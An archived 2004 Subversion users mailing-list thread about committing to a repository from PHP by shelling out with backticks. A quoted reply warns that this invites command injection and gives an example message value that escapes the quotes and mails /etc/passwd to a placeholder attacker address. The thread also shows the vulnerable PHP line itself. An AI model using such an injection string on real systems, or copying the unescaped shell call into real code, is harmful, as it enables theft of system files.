[svn.haxx.se] · SVN Dev · SVN Users · SVN Org · TSVN Dev · TSVN Users · Subclipse Dev · Subclipse Users · this month's index

Re: PHP hack under way

From: Rick Gigger <rick_at_alpinenetworking.com>
Date: 2004-02-11 23:56:04 CET

Isn't this a project to create real php bindings?

http://spe.tigris.org/

Bryan Simmons wrote:

> But $message is created by the script, with no user
> input. It comes
> from portal variables such as the current user and
> location in the
> portal. Also, the apache2 server is running as the
> svn user who can
> only access things in ~/ and
> /usr/local/apache2/htdocs.
>
>
>
>
>
> Regards,
>
> Bryan Simmons
>
>
> -----Original Message-----
> From: Brian W. Fitzpatrick [mailto:fitz@red-bean.com]
> Sent: Wednesday, February 11, 2004 4:56 PM
> To: Simmons, Bryan
> Cc: users@subversion.tigris.org
> Subject: Re: PHP hack under way
>
>
> On Wed, 2004-02-11 at 14:58, Simmons, Bryan wrote:
>
>>Ok, so I went ahead and took the easiest approach I
>
> could: svn client
>
>
>>commands in php. The kinks have not all been worked
>
> out for my php
>
>>portal but I did find a way to successfully
>>push revisions to subversion through php.
>>
>>I use the backtick operator. Yep, it's that simple.
>>
>>$response = `svn commit -m \"$message\"`;
>>
>>I have found that the $response is dead-on accurate
>
> in this case
>
>>despite warnings that the command line response may
>
> be garbled into
>
>>binary.
>>
>>Here's a question: will svn add && svn commit work?
>
>
> I don't know offhand, but I suspect that you may be
> opening up a
> security hole the size of Texas by doing this. What
> if message is
> actually equal to
>
> "foo\" ; mail evilhaxor@example.com < /etc/passwd"
>
> or something worse.
>
> Just a little something to think about.
>
> -Fitz
>
>
>
> __________________________________
> Do you Yahoo!?
> Yahoo! Finance: Get your refund fast by filing online.
> http://taxes.yahoo.com/filing.html
>
> ---------------------------------------------------------------------
> To unsubscribe, e-mail: users-unsubscribe@subversion.tigris.org
> For additional commands, e-mail: users-help@subversion.tigris.org
>

---------------------------------------------------------------------
To unsubscribe, e-mail: users-unsubscribe@subversion.tigris.org
For additional commands, e-mail: users-help@subversion.tigris.org
Received on Wed Feb 11 23:56:52 2004

This is an archived mail posted to the Subversion Users mailing list.

This site is subject to the Apache Privacy Policy and the Apache Public Forum Archive Policy.